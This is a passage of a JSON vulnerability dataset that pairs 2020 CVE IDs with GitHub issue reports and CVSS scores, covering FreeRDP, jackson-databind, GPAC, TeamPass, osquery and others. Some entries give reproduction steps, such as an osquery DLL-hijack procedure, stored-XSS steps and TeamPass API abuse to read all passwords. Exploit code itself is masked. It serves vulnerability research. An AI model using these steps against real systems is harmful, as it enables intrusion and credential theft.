        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6009",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6009",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2020-03-31T06:00:40Z",
        "description": "memory out of bounds read in APITAG version APITAG vuln code APITAG read NUMBERTAG bytes from stream without check stream's length CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 5.2,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2020-11048",
        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6007",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6007",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2020-03-31T05:40:01Z",
        "description": "memory out of bounds read in rdp_read_flow_control_pdu. version APITAG vuln code APITAG could read NUMBERTAG byte from stream, if APITAG , it could call APITAG . ERRORTAG APITAG just read some byte from stream without check length, it could APITAG , then the check in other function could failed CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 2.2,
        "impactScore": 1.4,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2020-11049",
        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6008",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6008",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2020-03-31T05:49:34Z",
        "description": "memory out of bounds read in APITAG version APITAG vuln code if APITAG and APITAG , it could one byte overflow read in APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 2.2,
        "impactScore": 1.4,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2020-11052",
        "Issue_Url_old": "https://github.com/Sorcery/sorcery/issues/231",
        "Issue_Url_new": "https://github.com/sorcery/sorcery/issues/231",
        "Repo_new": "sorcery/sorcery",
        "Issue_Created_At": "2020-04-30T15:06:10Z",
        "description": "brute force vulnerability. Sorcery NUMBERTAG is vulnerable to brute force attacks even if an login_lock_time_period is configured. If an attacker continues their login attempts after the initial login_lock_time_period has passed, Sorcery no longer rejects those login attempts until eventually the attacker has guessed the right password. This is caused by an early return in PATHTAG which skips the update of the APITAG field. So failed attempts don't update APITAG as long as APITAG contains any date, even if already passed. I'll provide a fix.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11054",
        "Issue_Url_old": "https://github.com/qutebrowser/qutebrowser/issues/5403",
        "Issue_Url_new": "https://github.com/qutebrowser/qutebrowser/issues/5403",
        "Repo_new": "qutebrowser/qutebrowser",
        "Issue_Created_At": "2020-05-02T14:11:19Z",
        "description": "Security: Reloading page with certificate errors shows a green URL. While working on APITAG I noticed that only the first load of pages with certificate errors gets a correctly colored URL. When loading a page with the default APITAG setting, there's a prompt to confirm the certificate issue: FILETAG When answering that with \"yes\", the URL is then colored yellow ( APITAG ) rather than green ( APITAG ): FILETAG However, when reloading the page (or loading it again in another tab), the URL is green: FILETAG This is because APITAG remembers the answer internally and we don't get a ERRORTAG signal anymore unfortunately there's also no API to check the certificate state of the current page... I'm handling this as a low severity security vulnerability and will request a CVE. There's no way for bad actors to exploit this and the user already did override the certificate error (so should be aware that the connection is not to be trusted), but it still lures users into a false sense of security. A fix, release and security announcement is in progress.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.5,
        "impactScore": 1.4,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2020-11058",
        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6011",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6011",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2020-03-31T10:46:15Z",
        "description": "stream out of bounds seek in rdp_read_font_capability_set could lead out of bounds read later. version APITAG vuln code APITAG first read NUMBERTAG byte to length, then check APITAG assume APITAG and APITAG , then the program will pass the check and continue execution ERRORTAG we could control APITAG , then it could enter APITAG APITAG APITAG could call APITAG , because APITAG But currently APITAG CODETAG After APITAG done, it could APITAG Then the check in other functions could fail, and could lead out of bounds read later.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 2.2,
        "impactScore": 1.4,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2020-11073",
        "Issue_Url_old": "https://github.com/MichaelAquilina/zsh-autoswitch-virtualenv/issues/122",
        "Issue_Url_new": "https://github.com/michaelaquilina/zsh-autoswitch-virtualenv/issues/122",
        "Repo_new": "michaelaquilina/zsh-autoswitch-virtualenv",
        "Issue_Created_At": "2020-01-07T11:00:15Z",
        "description": "This is incredibly insecure!. APITAG The script APITAG will be sourced without any user interaction , which will NUMBERTAG Erase the APITAG virtualenv\" message from the terminal (so the user isn't even aware that anything has happened NUMBERTAG Write the output of APITAG to a file called APITAG . Obviously this would be more malicious in practice",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-11075",
        "Issue_Url_old": "https://github.com/anchore/anchore-engine/issues/430",
        "Issue_Url_new": "https://github.com/anchore/anchore-engine/issues/430",
        "Repo_new": "anchore/anchore-engine",
        "Issue_Created_At": "2020-04-22T22:33:27Z",
        "description": "Ensure only supported os overrides are used in skopeo download commands. In the anchore skopeo wrapper, as of NUMBERTAG there is logic that supports multiple attempts to download an image from a registry using a combination of os override and destination type options. The initial implementation in NUMBERTAG attempts to derive an os override option from the image manifest itself, but there are only a couple of overrides that are supported, so it would be better to explicitly enumerate them rather than attempting to use a field from the image manifest. This would have two benefits NUMBERTAG while the input is run through an internal command sanitizer, it may be possible for a string to be crafted to circumvent sanitization and cause incorrect/insecure call out to the skopeo command (e.g. potential for a command injection NUMBERTAG there are only a few known overrides that are supported, so there is no need for this field to be inferred from any input source, which would fail for any override other than the known set that are supported Suggested fix is to alter the code to use an explicit enumeration of the os override options that are supported by anchore/skopeo.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.9,
        "impactScore": 6.0,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2020-11081",
        "Issue_Url_old": "https://github.com/osquery/osquery/issues/6426",
        "Issue_Url_new": "https://github.com/osquery/osquery/issues/6426",
        "Repo_new": "osquery/osquery",
        "Issue_Created_At": "2020-05-01T16:55:20Z",
        "description": "Privilege Escalation Bug in Osquery NUMBERTAG windows) via Dll Search Order Hijacking . Hell osquery team, As per facebook security team, they APITAG recommended to create issue here. Title Privilege Escalation Bug in Osquery NUMBERTAG windows) via Dll Hijacking Vuln Type Code Execution Product Area Open Source (e.g. HHVM) APITAG Complete Details FILETAG NUMBERTAG Create custom payload dll (image: APITAG FILETAG NUMBERTAG Create batch file to execute which include in payload dll (image: APITAG FILETAG NUMBERTAG Then,create or drop payload dll to writable folder C:\\python NUMBERTAG image: APITAG FILETAG NUMBERTAG Check the file that doesn't exist by default (image: APITAG FILETAG NUMBERTAG Then reboot pc ( It's mean user haven't permission to start service. Reboot since osqueryd service is auto). or restart the service (for testing with admin). After reboot or restart the service, Malicious dll APITAG has been loaded and payload will execute. (image: APITAG FILETAG NUMBERTAG payload dll executed as a command FILETAG /c PATHTAG and batch file executed \"whoami\" and print out to FILETAG (image: APITAG ![osquery7]( FILETAG I hope you to understand about my details steps. Thanks. With Best, Sai Wynn Myat.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.2,
        "impactScore": 6.0,
        "exploitabilityScore": 1.5
    },
    {
        "CVE_ID": "CVE-2020-11104",
        "Issue_Url_old": "https://github.com/USCiLab/cereal/issues/625",
        "Issue_Url_new": "https://github.com/uscilab/cereal/issues/625",
        "Repo_new": "uscilab/cereal",
        "Issue_Created_At": "2020-03-03T02:10:37Z",
        "description": "Serializing long double variables leaks uninitialized memory. Serializing the C/C++ native type long double stores uninitialized data into the serialized form. Compile and run the following program with valgrind to observe this. CODETAG It is apparently an inherent trait of the long double type that even an initialized variable leaves some of its raw storage uninitialized. This gives valgrind errors when compiled with both gcc and clang: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11105",
        "Issue_Url_old": "https://github.com/USCiLab/cereal/issues/636",
        "Issue_Url_new": "https://github.com/uscilab/cereal/issues/636",
        "Repo_new": "uscilab/cereal",
        "Issue_Created_At": "2020-03-27T23:28:34Z",
        "description": "std::shared_ptr serialization asymmetry (depends on memory layout). Cereal employs caching of APITAG values, using the raw pointer as a unique identifier. This becomes problematic if an APITAG variable goes out of scope and is freed, and a new APITAG is allocated at the same address. Serialization fidelity thereby becomes dependent upon memory layout. CODETAG Output is: APITAG The input is (true, false) but the output is (true, true).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11106",
        "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/603",
        "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/603",
        "Repo_new": "trippo/responsivefilemanager",
        "Issue_Created_At": "2020-03-28T11:53:58Z",
        "description": "Stored xss in NUMBERTAG in FILETAG in $_SESSION['RF'][\"view_type\"] because of no validation if FILETAG setted this session.. After taking another look at the APITAG NUMBERTAG i noticed that in the FILETAG file on line NUMBERTAG that if the $_SESSION['RF'][\"view_type\"] is already set that there would not be done any validation or would it take the data from the config. URLTAG This created a problem because in FILETAG in the \"view\" action in the \"type\" parameter it is possible to set that value without any validation. URLTAG This means if you would first request a session by going to the FILETAG , than going to the FILETAG and request the view action and as \"type\" parameter you give a html tag. Than if you done al that go back to the FILETAG page than $_SESSION['RF'][\"view_type\"] would be read and unescaped placed on all places where $view is used what created stored xss until the session isn't valid anymore. A very simple patch would be to add APITAG in the FILETAG on line NUMBERTAG when the $view is set. URLTAG I made a simple html file you can use to validate this vulnerability. It is made for Firefox because it does make use of iframe's and a clickjacking vulnerability but if the session was already set than this would also work in other browsers with a miner change. you would need to change all \" URLTAG \" to your website. When runned it would make NUMBERTAG iframe's. One to request the FILETAG file to get a PHPSESSID and to set $_SESSION['RF'][\"verify\"] as APITAG Second it would open the FILETAG to set the html tag. And tirth it reopens the FILETAG page to trigger the stored xss ERRORTAG A CVE has been requested.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11111",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2664",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2664",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-03-24T17:04:06Z",
        "description": "Block one more gadget type (...). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11112",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2666",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2666",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-03-25T17:06:51Z",
        "description": "Block one more gadget type (commons proxy). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11113",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2670",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2670",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-03-28T18:08:54Z",
        "description": "Block one more gadget type ( ). APITAG in Progress) Another gadget type(s) reported regarding class(es) of [...] library. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11441",
        "Issue_Url_old": "https://github.com/phpmyadmin/phpmyadmin/issues/16056",
        "Issue_Url_new": "https://github.com/phpmyadmin/phpmyadmin/issues/16056",
        "Repo_new": "phpmyadmin/phpmyadmin",
        "Issue_Created_At": "2020-03-30T01:21:02Z",
        "description": "CRLF/HTML entity injection with most recent version of APITAG Describe the bug The login form does not properly escape CRLF sequences, this can lead to HTML entity injection at the very least, or reflected XSS at the very worst. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to APITAG NUMBERTAG Insert into the login fields, username, password, and the hidden field of target, and insert this value into those fields: APITAG and the login error will display the injected CRLF sequences, and injected url encoded entities, such as single or double quotes(double quotes are not as effective as single quotes). Expected behavior I expected the application to drop/filter out the CRLF sequences seeing as an issue similar was detected back in NUMBERTAG Screenshots FILETAG FILETAG Server configuration Operating system: Ubuntu Web server: Apache Database version: APITAG PHP version: most recent. APITAG version: most recent. Client configuration Browser: Firefox Operating system: Windows NUMBERTAG Additional context None.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11499",
        "Issue_Url_old": "https://github.com/fkie-cad/FACT_core/issues/375",
        "Issue_Url_new": "https://github.com/fkie-cad/fact_core/issues/375",
        "Repo_new": "fkie-cad/fact_core",
        "Issue_Created_At": "2020-03-29T18:07:13Z",
        "description": "Stored XSS when updating analysis details. The application does not sanitize the user input when updating the details of a firmware. When updating the firmware details, the applications posts the data to the \"upload analysis/ FILETAG Adding js to the tags field FILETAG When browsing to the home page it loads the js FILETAG js is executed FILETAG Used the escape function to sanitize the input FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11529",
        "Issue_Url_old": "https://github.com/getgrav/grav/issues/3134",
        "Issue_Url_new": "https://github.com/getgrav/grav/issues/3134",
        "Repo_new": "getgrav/grav",
        "Issue_Created_At": "2021-01-06T15:12:06Z",
        "description": "APITAG Open redirect with trailing slash redirect. Environment grav version NUMBERTAG Admin NUMBERTAG php NUMBERTAG and NUMBERTAG tested Problem If grav is on root folder on a domain it seems there is a open redirect. Fist analysis Origin of the problem seems to be the redirect by setting Redirect trailing slash on. Examples Open redirect if on root folder: URLTAG Response header (short NUMBERTAG Found > location | PATHTAG It redirects to: APITAG Less(?) a problem if in subfolder: URLTAG Response header (short NUMBERTAG Found > location PATHTAG Not sure what version is running on your website but it seems not vulnerable: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11558",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1440",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1440",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-03-24T17:16:05Z",
        "description": "3 UAF bugs in box_funcs.c. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG Hi GPAC Team, I found NUMBERTAG new UAF bugs on the lastest commit NUMBERTAG eaea8 of GPAC version NUMBERTAG I think it is probably due to an imcomplete fix of the UAF bug URLTAG Actually, these new bugs share the same buggy function which is APITAG in PATHTAG with URLTAG but have different alloc function APITAG in APITAG (instead of APITAG ). Command: APITAG or APITAG NUMBERTAG UAF Bug NUMBERTAG APITAG URLTAG ASAN says: ~~~ APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG dde8 at pc NUMBERTAG c NUMBERTAG e bp NUMBERTAG fff NUMBERTAG c3b NUMBERTAG sp NUMBERTAG fff NUMBERTAG c3b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG dde8 thread T NUMBERTAG c NUMBERTAG d in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c NUMBERTAG cd in gf_isom_box_array_read_ex PATHTAG NUMBERTAG ae0b0f in APITAG PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_read PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_parse_ex PATHTAG NUMBERTAG c6e NUMBERTAG in gf_isom_box_array_read_ex PATHTAG NUMBERTAG aeffe8 in APITAG PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_read PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_parse_ex PATHTAG NUMBERTAG c6e NUMBERTAG in gf_isom_box_array_read_ex PATHTAG NUMBERTAG ae NUMBERTAG in APITAG PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_read PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_parse_ex PATHTAG NUMBERTAG c7fb4 in gf_isom_parse_root_box PATHTAG NUMBERTAG dd NUMBERTAG in gf_isom_parse_movie_boxes PATHTAG NUMBERTAG e NUMBERTAG d3 in gf_isom_parse_movie_boxes PATHTAG NUMBERTAG e NUMBERTAG d3 in gf_isom_open_file PATHTAG NUMBERTAG d in APITAG PATHTAG NUMBERTAG fca8b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG e4f8 in _start ( PATHTAG NUMBERTAG dde8 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG fca8c NUMBERTAG a in __interceptor_free ( PATHTAG NUMBERTAG c5f9f in gf_isom_box_del PATHTAG previously allocated by thread T0 here NUMBERTAG fca8c NUMBERTAG in malloc ( PATHTAG NUMBERTAG adb NUMBERTAG d in APITAG PATHTAG SUMMARY: APITAG heap use after free PATHTAG gf_isom_box_del ~~~",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11612",
        "Issue_Url_old": "https://github.com/netty/netty/issues/6168",
        "Issue_Url_new": "https://github.com/netty/netty/issues/6168",
        "Repo_new": "netty/netty",
        "Issue_Created_At": "2016-12-30T18:14:58Z",
        "description": "APITAG Codecs should enforce memory allocation size limits. Expected behavior To protect against OOME the compression and decompression codecs should explicitly limit the amount of data they compress and decompress. We may be vulnerable to OOME from large or malicious input. Actual behavior In light of URLTAG most of the compression/decompression codecs don't enforce limits on buffer allocation sizes. Steps to reproduce N/A Minimal yet complete reproducer code (or URL to code) N/A Netty version NUMBERTAG SNAPSHOT JVM version (e.g. APITAG ) N/A OS version (e.g. ERRORTAG ) N/A",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11619",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2680",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2680",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-04-07T01:41:49Z",
        "description": "Block one more gadget type. (note: placeholder until fixed) Another gadget type(s) reported regarding class(es) of [TO BE FILLED]. library. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-11620",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2682",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2682",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-04-07T15:54:48Z",
        "description": "Block one more gadget type (commons jelly). (note: placeholder until fixed) Another gadget type(s) reported regarding class(es) of APITAG . library. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-11671",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2765",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2765",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2020-04-02T16:23:40Z",
        "description": "APITAG API has no authorization checks. APITAG provides several APIs that can be used for programmatic access. None of these API functions perform authorization checks which means that any client with a valid API token is effectively an administrator. Any client with a valid API token can: Read all passwords stored by Teampass Create users. This includes non administrative users creating administrative users Update any stored item Update any user Delete any folder or item It\u2019s important to note that API access is disabled by default. Steps to reproduce NUMBERTAG Turn on API access NUMBERTAG As a non admin user, generate an API key NUMBERTAG Send authenticated HTTP requests Retrieve passwords: APITAG Note that the ID for each \u201citem\u201d starts at NUMBERTAG and increments by NUMBERTAG for each new item. This makes it easy to retrieve all items stored by Teampass APITAG Add a new admin user CODETAG Server configuration Teampass version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11709",
        "Issue_Url_old": "https://github.com/yhirose/cpp-httplib/issues/425",
        "Issue_Url_new": "https://github.com/yhirose/cpp-httplib/issues/425",
        "Repo_new": "yhirose/cpp-httplib",
        "Issue_Created_At": "2020-04-11T03:38:58Z",
        "description": "set_redirect & set_header are susceptible to http response splitting attack. ref: URLTAG Analysis CODETAG APITAG CODETAG Lastly, this library is gorgeous. Thank you!!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11721",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/134",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/134",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2020-04-11T06:09:36Z",
        "description": "Invalid free wild pointer lead to DOS in load_png in loader.c. APITAG has a pointer rows , which should be set to NULL, otherwise cleanup code would use(calling free ) it. binary: img2sixel file: loader.c function: load_png poc: FILETAG result: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-11767",
        "Issue_Url_old": "https://github.com/istio/istio/issues/9429",
        "Issue_Url_new": "https://github.com/istio/istio/issues/9429",
        "Repo_new": "istio/istio",
        "Issue_Created_At": "2018-10-19T15:08:30Z",
        "description": "ERRORTAG NR when using browser on multiple ingress gateways. Describe the bug When using browsers (tested on multiple browsers, multiple OS, multiple devices and multiple connections), we are having many ERRORTAG NR responses when contacting our services on an additional ingress gateway. The service is loading well every time I'm cleaning the browsers cache and when using command line clients. Routing is done with hostname in separate gateway and virtual services configurations. All services are exposed on port NUMBERTAG using different port names but the same TLS certificate. Ingress log is printing the good hostname but envoy is not finding any routes. Expected behavior We expect to have the requests routed to the service or a way to find if there is something missing in the configuration. Steps to reproduce the bug Install another ingress gateway using helm Deploy NUMBERTAG services and expose it using a gateway with TLS on port NUMBERTAG Use a browser to access the services Version Kubernetes NUMBERTAG on AWS Istio NUMBERTAG Installation Istio installed using helm chart with a first ingress gateway. Second gateway installed using helm in a namespace. Services installed using helm charts. Environment Kubernetes deployed on AWS using Kops with coreos images. Cluster state FILETAG I could not dump pods and deployments due to private information in environment variables",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.1,
        "impactScore": 1.4,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2020-11767",
        "Issue_Url_old": "https://github.com/istio/istio/issues/13589",
        "Issue_Url_new": "https://github.com/istio/istio/issues/13589",
        "Repo_new": "istio/istio",
        "Issue_Created_At": "2019-04-24T17:12:32Z",
        "description": "Istio does not adhere to HTTP NUMBERTAG RFC NUMBERTAG Bug description Istio does not properly send a NUMBERTAG response when a connection is reused and accident sent to a server that is not the correct origin. This can occur when there are two gateways, one with a wildcard certificate ( . APITAG and one with a different non wildcard certificate (b. APITAG routing to two different apps (a.example.com and b. APITAG where a http NUMBERTAG connection is first established to the wildcard gateway (on host a.example.com with . APITAG then a resource is requested from an application on the non wildcard gateway (b.example.com with certificate b. APITAG Because of http NUMBERTAG connection reuse it's possible for traffic destined for the second app (b. APITAG to end up being routed on the existing connection for (a. APITAG due to the RFC definition of connection re use in section NUMBERTAG FILETAG e.g., because the certificate can authoritatively handle the request, and the IP address is the same as they are on the same ingressgateway). When that happens, according to section NUMBERTAG istio should respond with a NUMBERTAG indicating that the wrong connection was used and the origin was not found. This would instruct the browser to retry on a new connection, thus renegotiating TLS and presenting SNI and thus going down the non wildcard certificate route and to a different gateway/virtual service and the correct service. Expected behavior Instead of returning a NUMBERTAG as section NUMBERTAG indicates in RFC NUMBERTAG istio returns a ERRORTAG . Steps to reproduce the bug NUMBERTAG Create istio NUMBERTAG instance with one ingress gateway NUMBERTAG Create a DNS record a. APITAG and b.example.com both point to the ingress gateway NUMBERTAG Create a gateway named \"a\" for a.example.com that uses .example.com server host, and has a wildcard certificate for . APITAG NUMBERTAG Create a gateway named \"b\" for b.example.com that uses b.example.com server host and has a specific certificate b. APITAG NUMBERTAG Create an app that hosts a static website with two files FILETAG and FILETAG . The FILETAG file should have an image tag that refers to an image FILETAG (e.g., APITAG NUMBERTAG Deploy the app twice to Kubernetes and attach virtual services for a.example.com to go to the app and b.example.com to go to the app (effectively a.example.com and b.example.com are both hosting the app with different certificates on the same IP address, where a is on a wildcard cert and b is not NUMBERTAG isit URLTAG notice that you receive a ERRORTAG in Chrome and Firefox but not safari or opera. Version (include the output of APITAG and kubectl version ) CODETAG How was Istio installed? Helm Environment where bug was observed (cloud vendor, OS, etc) AWS, with istio installed and running with an NLB ingress or as a nodeport terminating the TLS.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.1,
        "impactScore": 1.4,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2020-11767",
